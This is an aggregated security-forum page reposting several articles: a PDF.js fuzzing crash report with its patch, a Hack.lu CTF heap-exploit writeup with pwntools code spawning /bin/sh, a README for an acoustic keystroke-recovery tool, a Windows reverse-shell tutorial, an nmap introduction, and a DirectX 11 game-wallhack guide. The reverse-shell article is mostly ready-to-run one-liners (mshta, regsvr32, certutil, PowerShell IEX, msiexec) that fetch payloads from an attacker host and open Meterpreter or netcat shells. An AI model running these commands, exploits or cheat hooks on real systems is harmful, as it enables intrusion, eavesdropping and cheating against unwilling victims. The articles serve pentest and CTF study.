Nytro

Fuzzing HTTP Server (PDF.js) Hi Internet Summary: While fuzzing Mozilla PDF.js a format string vulnerability was observed. PS: The patch for the path traversal bug which was found perviously gave rise to this issue. I have used boofuzz in the case to fuzz PDF.js, boofuzz is a fork of and the successor to the venerable sulley fuzzing framework, for installation you can simply use pip. pip install boofuzz Then, session = Session( target=Target( connection=SocketConnection("127.0.0.1", 8888, proto='tcp'))) In boofuzz each message starts with an s_initialize() s_initialize(name="Request") with s_block("Request-Line"): s_group("Method", ['GET']) s_string("/", name='Request-URI') s_string('HTTP/1.1', name='HTTP-Version') Vulnerable code in PDF.js (webserver.js😞 _handler: function (req, res) { var url = req.url.replace(/\/\//g, '/'); var urlParts = /([^?]*)((?:\?(.*))?)/.exec(url); // guard against directory traversal attacks, // e.g. /../../../../../../../etc/passwd // which let you make GET requests for files outside of this.root var pathPart = path.normalize(decodeURI(urlParts[1])); If you see the bold part of the above code the PDF.js did not have any guard for malformed URI sent in various methods. However, the fuzzer ran for an hour and it was observed that the HTTP server of PDF.js can't handle malformed strings and server gets crash. While fuzzing with boofuzz its better to start Wireshark on 'lo' to see all the fuzzed request which are sent to the server. I found /%s%s%s was used in this case. curl -v -X GET 127.0.0.1:8888/%s%s%s The PDF.js server gets crash and below traces are left. Server running at http://localhost:8888/ [12:16:22] 'server' errored after 1.01 h [12:16:22] URIError: URI malformed at decodeURI () at WebServer._handler (/Users/Dhiraj/Desktop/pdf.js/test/webserver.js:86:35) at Server.emit (events.js:188:13) at Server.EventEmitter.emit (domain.js:459:23) at parserOnIncoming (_http_server.js:676:12) at HTTPParser.parserOnHeadersComplete (_http_common.js:113:17) However, the bug was submitted to Mozilla and a patch was deployed for same. Patch code in PDF.js (webserver.js😞 try { // Guard against directory traversal attacks such as // `/../../../../../../../etc/passwd`, which let you make GET requests // for files outside of `this.root`. var pathPart = path.normalize(decodeURI(urlParts[1])); } catch (ex) { // If the URI cannot be decoded, a `URIError` is thrown. This happens for // malformed URIs such as `http://localhost:8888/%s%s` and should be // handled as a bad request. res.writeHead(400); res.end('Bad request', 'utf8'); return; } var queryPart = urlParts[3]; var verbose = this.verbose; If you are a mozillian and you like my work towards PDF.js, don't hesitate to vouch me Hope you like the read. https://mozillians.org/en-US/u/Dhiraj_Mishra/ Thank you Dhiraj Postado por Dhiraj Mishra �s 00:25 Sursa: https://www.inputzero.io/2019/01/fuzzing-http-servers.html

Hack.lu - HeapHeaven write-up with radare2 and pwntools (ret2libc) Intro In the quest to do heap exploits, learning radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the Hack.lu CTF: Hack.lu challenges by FluxFingers You can see from that list the Pwn category that there are a few ones so I tried not to overkill myself with difficulty and go for the easiest Heap one, HeapHeaven. As much as I wanted to try the HouseOfScepticism because of the resemblance with the Malloc Malleficarum techniques, when opening it on radare2, it looked quite a bit daunting: no symbols, tons of functions here and there and my inexperience on reading assembly. Another goal for this post is to make some kind of introduction to the usage of radare2. It's quite a good tool with tons of utilities inside such as ROP, search for strings, visual graphs, etc. The analysis heaps and pieces For this challenge we are given (again) the libc.so.6 along the binary. If this is a good giveaway that we will have to do some jump to libc's functions to gain code execution. The binary itself is just an: HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped Cool! It's not stripped. This means that we have all the debugging symbols. First thing I did was throwing it into radare2 and check the functions from the menu we are presented with: HeapHeaven menu We can see that the functions should be something like "whaa!", "mommy?", etc. Firing up the radar We fire up radare2 against the HeapHeaven file like so: $: radare2 HeapHeaven -AA This will open the file and do an extensive analysis of it. For a quicker but less extensive analysis, we can just put one "A". Once the analysis is complete, we can head to the var code analysis menu by writing the command vv and pressing enter. If you haven't ever used radare2, you are wondering if all the commands are going to be like "aa" "vv" "cc". Well... radare2 trolling After typing in vv we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay! Non-stripped symbols on radare2 By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition is telling us that this function will serve to allocate chunks of whichever size we specify and that, the other functions, will be doing all other heap manipulation. To prove this inside radare2, we browse with the arrow keys to the function we want and then press g to seek to that function position. Then press V (shift + "V") to go to the visual graph representation. whaa! function representation Watch out for the differences here vs x86 (32 bit). As we can see, the arguments aren't pushed to the stack like we are used to see on x86. On x86_64 we can see that the most common way is to pass the arguments in the registers, especially the RDI register. Something that doesn't change is how functions return their values, this is, into the RAX/EAX register. I am going to spoil the get_num function a bit and say that, it is actually nor parsing a number. Let's see it in radare2. Again, seek to the function and press capital V: DIsassembly of get_num It is clearly seen that the function is trying to read, through the scanf function, the format %255s and it will get stored on the argument pointed by the RAX register. In radare2, it's shown as local_110h which is then passed to parse_num. Zoom out of parse_num function. Here, thanks to the blue arrows that radare2 describes, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and previously a string was scanf'ed, it would not be a bad assumption to think that it's parsing our string. Prologue of parse_num function. Indeed, the string is passed into RDI is stored in a local variable local_18h. This is afterwards compared against certain bytes and the counter (local_ch) of the loop is incremented by 2. The operation done inside the loop is actually, "binary adding" through bitshifting with the shl opcode. Finally, the resulting operation is stored in another variable to be returned into RAX (local_8h). Function parse_num comparing bytes. I spent some time "deciphering" what this code was doing and reading about opcodes. If we watch closely, both are doing almost the same. The only difference is that the second is increasing by one the counter (rax + 1), and then accessing the byte to that offset of the array (mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]) to compare it against he byte 0x69 (letter "i"). Something that would help us in this point is, renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want to with: [0x00000b8d]> s sym.parse_num [0x000009ca]> afvn local_ch counter_int [0x000009ca]> afvn local_18h arg_string [0x000009ca]> afvn local_8h result Second part of parse_num function with renamed variables. This is now quite clearer, isn't it? Basically, it is being compared against the bytes 0x77, 0x69 and 0x61. If it's 0x77 (letter "w"), it will jump to the next char and check if it's 0x69 or 0x61 (letter "a"). If the next char is "i", it will add one to the result. Else, if the char is "a", it will just increase the counter and keep parsing. See the translation? We are feeding binary numbers as toddlers (regarding FluxFingers) speak, "wi" being 1 and "wa" being 0. The exploit Having the following functions: whaa!: Allocates chunks of a specified size. mommy?: Reads a string from a specified offset. <spill>: Writes to an specified offset. NOM-NOM: Free's a pointer at an specified offset. Here's what we need to do. Leak top and heap pointers Calculate the offset to __malloc_hook Calculate the offset to system Write the address of system into __malloc_hook Call system with "/bin/sh" as an argument babbling comprehensively To code the solution I relied heavily on pwntools by Zach Riggle. The library is just great. I started writing a function that will translate an hex number to a comprehensive babbling ("wiwawiwa" like). ... def translate_baby(size): wiwa = "" for bit in ("%s" % "{0:b}".format(size)): if bit == "1": wiwa += "wi" else: wiwa += "wa" return ("%s" % (wiwa+"0"*(254-len(wiwa)))) ... I am padding the string with zeroes to the right. This is because the scanf tries to read %255s and, the loop, won't stop until the counter reaches 0x3f. This would cause trouble because if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory. leaking addresses From the Painless intro to ptmalloc2, we remember that a normal chunk had the following structure: +---------------------------------+-+-+-+ | CHUNK SIZE |A|M|P| +---------------------------------+-+-+-+ | FORWARD POINTER(FD) | | BACK POINTER(BK) | | | | | | - - - - - - - - - - - - - | | PREV_SIZE OR USER DATA | +---------------------------------------+ The FD pointer is set to, either the top chunk pointer if it's the only chunk free of that size or, to the next free chunk of the same size if there are more chunks free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and free's to set top and FD pointers to then, read those: ... # Alocate four chunks so we can avoid coalescing chunks and leak: # * Pointer to chunk2 # * Pointer to main_arena+88 (av->top) allocate_chunk(0x128, io) allocate_chunk(0x128, io) allocate_chunk(0x128, io) allocate_chunk(0x128, io) # Now free chunks 2 and 4 in that order so we can access their FD # The first free'd chunk's FD will point to main_arena->top # The second free'd chunk's FD will point to the second chunk free_chunk(0x20, io) free_chunk(0x280, io) # Read the FD pointers and store them to calculate offsets to libc main_arena_leak = read_from(0x20, io) print("[+] Main_arena: %#x" % main_arena_leak) heap_2nd_chunk = read_from(0x280, io) print("[+] 2nd chunk: %#x" % heap_2nd_chunk) ... I am not going to cover why or where those pointers are set since I think I have covered this matter extensively on previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we need to free the offset to 0x20 and the offset to 0x280. When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are single linked lists), hence jumping over the first fastchunk and going straight to free the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena. Function parse_num comparing bytes. Now we free the fourth chunk in order to populate it's FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previous free'd chunk 0x55cd4bd8020. Status of the fourth chunk after the second free We are ready to leak the addresses now. The only thing we need to do is call the menu function "mommy?" and feed it the previous offsets: ... # Read the FD pointers and store them to calculate offsets to libc main_arena_leak = read_from(0x20, io) print("[+] Main_arena: %#x" % main_arena_leak) heap_2nd_chunk = read_from(0x280, io) print("[+] 2nd chunk: %#x" % heap_2nd_chunk) ... Return to libc (ret2libc) After leaking both addresses, one to the heap and another one inside main_arena we have effectively bypassed ASLR. The main_arena is always placed at a fixed relative position from the other functions of the libc library. After all, the heap is implemented inside libc. To obtain the offsets to other functions we can just query inside gdb and then move the offsets depending on the libc we are targeting. Calculating offsets within gdb Let's start assigning all of this inside our exploit code: ... # Offset calculation happa_at = heap_2nd_chunk - 0x10 malloc_hook_at = main_arena_leak - 0x68 malloc_hook_offset = malloc_hook_at - happa_at libc_system = malloc_hook_at - 0x37f780 ... The variable happa_at is the address of the base of the heap. This is, the first allocated chunk of them all. malloc_hook_at represents the absolute address of the weak pointer __malloc_hook. We are using this hook to calculate offsets instead of the top chunk (there is no special reason for this). Finally, the system symbol is calculated and stored into the libc_system variable. We need happa_at because when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely, happa_at). Then, we provide the string we want to write at that offset. Our goal is to write at __malloc_hook the address of system. There are several techniques like creating fake FILE structures, overwriting malloc hooking functions or going after the dtors. All of this in order to redirect code execution. I chose this one since it's the one I feel is simpler enough and it is so convenient as the function we place in __malloc_hook must take the form of malloc. This means that the function we place in there must take an argument just as malloc, so system fits so well. wiwapwn Having in mind that __malloc_hook only gets triggered when an allocation happens and, that the argument to malloc is passed onto __malloc_hook therefore passed onto system. This means that the last malloc we trigger, needs to have a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then, feed the pointer to that chunk's position. I've chosen the first allocated chunk at offset 0x0, this is, the pointer pointed by happa_at: ... # write /bin/sh to the first chunk (pointed by happa_at) write_to(0x0, io, "/bin/sh\x00") ... Since we have calculated the offsets to all that we need let's overwrite the pointer of __malloc_hook with the pointer to system: ... # Write the address of system at __malloc_hook write_to(malloc_hook_offset, io, p64(libc_system)) ... All we need to do now is trigger __malloc_hook with the address of "/bin/sh\x00" as an argument and interact with the shell: ... # Call malloc and feed it the argument of /bin/sh which is at happa_at # This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :) allocate_chunk(happa_at, io) ... Exploit for HeapHeaven Final notes Note that I didn't need to change any offsets to system's libc to exploit the remote system. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc and we are provided with such what we need to do is, calculate the base of libc through leaked pointers and then, add offsets like such: Exploit for HeapHeaven Then, in our code we would have: libc_system = calculated_libc_base + 0x45390 As a final note. This blog was actually published in my actual company's internal blog that I decided to also make it publish through my blog since I don't think write-ups are SensePost's-blog-worthy. I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full HeapHeaven exploit code here. Publicado por Javier Jiménez en 9:51 Sursa: https://animal0day.blogspot.com/2017/10/hacklu-heapheaven-write-up-with-radare2.html

kbd-audio Description This is a collection of command-line and GUI tools for capturing and analyzing audio data. Keytap The most interesting tool is called keytap - it can guess pressed keyboard keys only by analyzing the audio captured from the computer's microphone. Check this blog post for more details: Keytap: description and some random thoughts Video: short demo of Keytap in action Keytap2 The keytap2 tool is another interesting tool for recovering text from audio. It does not require training data - instead it uses statistical information about the frequencies of the letters and n-grams in the English language. The tool is still in development, but you can see a short demonstration here: Video: Keytap2 - recovering text from typing sound (7:50) CTF: can you guess the text being typed? Build instructions Dependencies: SDL2 - used to capture audio and to open GUI windows libsdl [Ubuntu] $ sudo apt install libsdl2-dev [Mac OS with brew] $ brew install sdl2 FFTW3 (optional) - some of the helper tools perform Fourier transformations fftw Linux and Mac OS git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make Windows (todo, PRs welcome) Tools Short summary of the available tools. If the status of the tool is not stable, expect problems and non-optimal results. Name Type Status record text stable record-full text stable play text stable play-full text stable view-gui gui stable view-full-gui gui stable keytap text stable keytap-gui gui stable keytap2 text development keytap2-gui gui development - extra - guess_qp text experiment guess_qp2 text experiment key_detector text experiment scale text experiment subreak text experiment key_average_gui gui experiment Tool details record-full Record audio to a raw binary file on disk ./record-full output.kbd [-cN] play-full Playback a recording captured via the record-full tool ./play-full input.kbd [-pN] record Record audio only while typing. Useful for collecting training data for keytap ./record output.kbd [-cN] play Playback a recording created via the record tool ./play input.kbd [-pN] keytap Detect pressed keys via microphone audio capture in real-time. Uses training data captured via the record tool. ./keytap input0.kbd [input1.kbd] [input2.kbd] ... [-cN] [-pF] [-tF] keytap-gui Detect pressed keys via microphone audio capture in real-time. Uses training data captured via the record tool. GUI version. ./keytap-gui input0.kbd [input1.kbd] [input2.kbd] ... [-cN] **Live demo (WebAssembly threads required) ** keytap2-gui (work in progress) Detect pressed keys via microphone audio capture. Uses statistical information (n-gram frequencies) about the language. No training data is required. The 'recording.kbd' input file has to be generated via the record-full tool and contains the audio data that will be analyzed. The 'n-gram.txt' file has to contain n-gram probabilities for the corresponding language. ./keytap2-gui recording.kbd n-gram.txt view-full-gui Visualize waveforms recorded with the record-full tool. Can also playback the audio data. ./view-full-gui input.kbd view-gui Visualize training data recorded with the record tool. Can also playback the audio data. ./view-gui input.kbd Feedback Any feedback about the performance of the tools is highly appreciated. Please drop a comment here. Sursa: https://github.com/ggerganov/kbd-audio

Get Reverse-shell via Windows one-liner posted inPENETRATION TESTING on JANUARY 20, 2019 by RAJ CHANDEL SHARE This article will help those who play with CTF challenges, because today we will discuss “Windows One- Liner” to use malicious commands such as power shell or rundll32 to get reverse shell of the Windows system. Generally, while abusing HTTP services or other programs, we get RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to use the target machine to get reverse connections. Table of Content Mshta.exe Launch HTA attack via HTA Web Server of Metasploit Rundll32.exe Launch Rundll32 Attack via SMB Delivery of Metasploit Regsvr32.exe Launch Regsvr32 via Script Web Delivery of Metasploit Certutil.exe Launch MSbuild Attack via Msfvenom C# shellcode Powershell.exe Launch Powercat attack via Powershell Launch cscript.exe via Powershell Launch Batch File Attack via Powershell Msiexec.exe Launch msiexec attack via msfvenom Wmic.exe Launch Wmic.exe attack via Koadic Mshta.exe Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool. Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. 1 2 3 4 use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit Now run the malicious code through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain meterpreter sessions. Once you will execute the malicious hta file on the remote machine with the help of mshta.exe, you get reverse connection at your local machine (Kali Linux). 1 mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta As you can observe that, we have meterpreter session of the victim as shown below: Rundll32.exe Rundll32.exe is associated with Windows Operating System that allow you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries. Launch Rundll32 Attack via SMB Delivery of Metasploit Metasploit also contain “SMB Delivery” module which generate malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell. 1 2 3 use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions. Once you will execute the dll file on remote machine with the help of rundll32.exe, you will get reverse connection at your local machine (Kali Linux). 1 rundll3.exe \\192.168.1.109\vabFG\test.dll,0 As you can observe that, we have meterpreter session of the victim as shown below: Regsvr32.exe Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows. RegSvr32.exe has the following command-line options: Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname> /u – Unregister server /i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall /n – do not call DllRegisterServer; this option must be used with /i /s – Silent; display no message boxes Launch Regsvr32 via Script Web Delivery of Metasploit This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection. Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. 1 2 3 4 5 6 use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit Copy the highlighted text shown in below window Once you will execute the scrobj.dll file on remote machine with the help of regsrv32.exe, you will get reverse connection at your local machine (Kali Linux). 1 regsvr32 /s /n /u /i:http://192.168.1.109:8080/xt5dIF.sct scrobj.dll As you can observe that, we have meterpreter session of the victim as shown below: Certutil.exe Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get meterpreter session. Launch certutil Attack via Msfvenom Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get reverser shell of victim’s machine. 1 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe Now, in order to dump configuration information or files of shell.exe file with certutil, you can follow below systax: Syntax: [-f] [-urlcache] [-split] Path of executable file 1 certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Powershell.exe You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from official website of Microsoft Windows from here. Launch Powercat attack via Powershell Powercat is a PowerShell native backdoor listener and reverse shell also known as modify version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and also has a client- to- client relay, a term for Powercat client that allows two separate listeners to be connected. Download powershell in your local machine and then the powercat.ps1 transfer files with python http server to obtain reverse shell of the target as shown below and start netcat listener. 1 2 git clone https://github.com/besimorhino/powercat.git python -m SimpleHTTPServer 80 Then execute following command on remote side to get natcat session. 1 powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd" As you can observe that, we have netcat session of the victim as shown below: Batch File Similarly, powershell allows client to execute bat file, therefore let’s generate malicious bat file with msfvenom as given below and start netcat listener. 1 msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat Then execute following command on remote side to get natcat session. 1 powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat')) As you can observe that, we have netcat session of the victim as shown below: Cscript Similarly, powershell allows client to execute cscript.exe to run wsf, js and vbs script, therefore let’s generate malicious bat file with msfvenom as given below and start multi/handler as listener. 1 msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs Then execute following command on remote side to get meterpreter session. 1 powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Msiexec.exe As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe. Launch msiexec attack via msfvenom Let’s generate a MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as listener. 1 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi Once you will execute the 1.msi file on remote machine with the help of msiexec, you will get reverse connection at your local machine (Kali Linux). 1 msiexec /q /i http://192.168.1.109/1.msi 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Wmic.exe The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language). Launch Wmic.exe attack via Koadic Now will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire. To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/ Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home. 1 2 3 use stager/js/wmic set SRVHOST 192.168.1.107 run Execute WMIC following command to download and run the malicious XSL file from a remote server: 1 wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl" Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Sursa: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Incetul cu incetul, se dezvolta utilitatea acestor micro-patch-uri.

Network scanning with nmap On 21 January 2019 By nytrosecurity Introduction First step in the process of penetration testing is “Information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While it might be different for the different type of penetration tests, such as web application or mobile application pentest, network scanning is a crucial step in the infrastructure or network pentest. Let’s take a simple scenario: you are a penetration tester and a company want to test one of its servers. They send you the IP address of the server. How to proceed? Although nmap allows to easily specify multiple IP targets or IP classes, to keep things simple, I will use a single target IP address which I have the permission to scan (my server): 137.74.202.89. Why? To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database. Articol complet: https://nytrosecurity.com/2019/01/21/network-scanning-with-nmap/

Recomand: https://docs.microsoft.com/en-us/sysinternals/downloads/strings

Creating your own Wallhack niemand Posted on January 13, 2019 Wallhack In the previous posts we have done most of the heavy work, but what comes now is really simple compared with the rest. We have created a basic template for hooking DirectX11 and inject our own interface, then we created a Model Logger to allows us to highlight and identify the most important Models we wanted to modify, but something is missing, right? What can we do once we have the correct model highlighted? One of those things is a Wallhack of course! If you are here you know what a Wallhack is, this kind of game tweaking has been always known. In this post, we are going to see how to use our template to enable Wallhacking on the selected models, or what it is the same, disable Z-Buffering on DirectX. Revealing enemies behind another objects. How Z-Buffering works? Z-Buffering or Depth-Stencil (as is known in version 11), is a property that stored depth information used by DirectX when it is rendering a scene. It determines how deep each pixel is in the scene. By doing this, DirectX knows exactly which pixels to render from each model based on the value of this attribute. If we imagine this as two dimensions array, it will select for each pixel in X and Y the value based on Z-Buffering value. In other words, the object/model that its closer to the point of view. http://www.racketboy.com/retro/about-video-games-rasterization-and-z-buffer The main idea here will be to disable Z-Buffering for the models we want to reveal behind the rest of the models (walls, floors, etc). DirectX 9 vs DirectX 11 In both versions, this is actually quite easy, however, I want to remark the differences. For version 9, disabling is as simple as calling the method IDirect3DDevice9::SetRenderState, which receives two parameters: the device state variable that will be modified, and the new value. pDevice->SetRenderState(D3DRS_ZENABLE, false); In this case, the variable we need to modify is D3DRS_ZENABLE, and the new value is false. It’s just as simple as that. Something important that we have to remember for both versions is that we need to enable this again after calling the original DrawIndexedPrimitive, enabling Z-Buffering for all the rest of the models. For version 11, two different methods are required: ID3D11Device::CreateDepthStencilStateand ID3D11DeviceContext::OMSetDepthStencilState. The first one will be used to create an ID3D11DepthStencilState that will disable Z-Buffering and then be sent as a parameter to the second method when the model we want to reveal is being rendered, that means inside DrawIndexed. More info here. Let’s jump to the code! Oh wait, before that, I will like to resume the steps we need to implement our wallhack. Create a new DepthStencilState disabling Z-Buffering Check if we are rendering the target model. Disable Z-Buffering Render the Model Enable Z-Buffering again Create a new DepthStencilState disabling Z-Buffering How to create a new DepthStencilState is detailed in Microsoft documentation: Configuring Depth-Stencil Functionality. But remember that we will need to disable the Z-Buffering, so our version will be like this: ID3D11DepthStencilState *m_DepthStencilState; // Disabling Z-Buffering D3D11_DEPTH_STENCIL_DESC depthStencilDesc; depthStencilDesc.DepthEnable = TRUE; depthStencilDesc.DepthWriteMask = D3D11_DEPTH_WRITE_MASK_ALL; depthStencilDesc.DepthFunc = D3D11_COMPARISON_ALWAYS; depthStencilDesc.StencilEnable = FALSE; depthStencilDesc.StencilReadMask = 0xFF; depthStencilDesc.StencilWriteMask = 0xFF; // Stencil operations if pixel is front-facing depthStencilDesc.FrontFace.StencilFailOp = D3D11_STENCIL_OP_KEEP; depthStencilDesc.FrontFace.StencilDepthFailOp = D3D11_STENCIL_OP_INCR; depthStencilDesc.FrontFace.StencilPassOp = D3D11_STENCIL_OP_KEEP; depthStencilDesc.FrontFace.StencilFunc = D3D11_COMPARISON_ALWAYS; // Stencil operations if pixel is back-facing depthStencilDesc.BackFace.StencilFailOp = D3D11_STENCIL_OP_KEEP; depthStencilDesc.BackFace.StencilDepthFailOp = D3D11_STENCIL_OP_DECR; depthStencilDesc.BackFace.StencilPassOp = D3D11_STENCIL_OP_KEEP; depthStencilDesc.BackFace.StencilFunc = D3D11_COMPARISON_ALWAYS; Now its time to call CreateDepthStencilState. We will pass as parameter the D3D11_DEPTH_STENCIL_DESC we just created and a pointer to our new ID3D11DepthStencilState. pDevice->CreateDepthStencilState(&depthStencilDesc, &m_DepthStencilState); Now we are ready to move to the next step. Check if we are rendering the target model In our previous version of the template, we have been doing something similar to what we need here, but it will be better if we do some improvements. Until now we were checking the model we were currently rendering inside our hooked DrawIndexed method, but this was when we had a list of Models and we wanted to identify our target. What could we do now? Well, if we did our homework, we should have by now the Model Properties of our target and it’s time to use them. Let’s create a new std::unordered_set to store all the properties belonging to the Models we want to reveal and store there our collected values: std::unordered_set<propertiesModel> wallhackParams; void setupWallhack() { propertiesModel wallhackParamsItem; wallhackParamsItem.stride = 8; wallhackParamsItem.vedesc_ByteWidth = 16552; wallhackParamsItem.indesc_ByteWidth = 10164; wallhackParamsItem.pscdesc_ByteWidth = 832; wallhackParams.insert(wallhackParamsItem); } Those values, belong to the models of the enemies in mid/large range for Vermintide 2, and I found them by logging the Models with our template. In many games you will see that enemies may be split in multiple models, not only for the parts of the body/clothes but also this models could change depending on the distance between you and the object. By selecting the model used for rendering my enemy in a mid/large range, allows me to see them normally when they are close but highlighted when they aren’t next to me. Now we will modify our validations to see if we are rendering not only our current item from the Model List, but also one of the targeted models: if ((paramsModel == currentParams || wallhackParams.find(paramsModel) != wallhackParams.end() )&& bShader) { // SNIPPED if (bWallhack) { // DISABLE Z-Buffering } } else if ( (paramsModel == currentParams || wallhackParams.find(paramsModel) != wallhackParams.end()) && bTexture) { // SNIPPED if (bWallhack) { // DISABLE Z-Buffering } } If wallhackParams.find does not contain paramsModel it will be equal to .end element as the documentation says: std::set::find Disable Z-Buffering It’s so simple as the following line: pContext->OMSetDepthStencilState(m_DepthStencilState, 0); We are calling OMSetDepthStencilState with the DepthStencilState pointer we created before. Render the Model Then we have to call to the original the original DrawIndexed: fnID3D11DrawIndexed(pContext, IndexCount, StartIndexLocation, BaseVertexLocation); Enable Z-Buffering again What would happen if we do not enable Z-Buffering again? We are reveling multiple objects of the game since non of them have Z-Buffering enabled That’s why we will need to store the original DepthStencilState we had before disabling it: UINT stencilValue = 0; pContext->OMGetDepthStencilState(&m_origDepthStencilState, &stencilValue); And finally, after calling DrawIndexed, we set this value again: pContext->OMSetDepthStencilState(m_origDepthStencilState, stencilValue); Result Once we have everything working we will see something like this: Next Steps? DirectX is extremely powerful and we have seen just a few 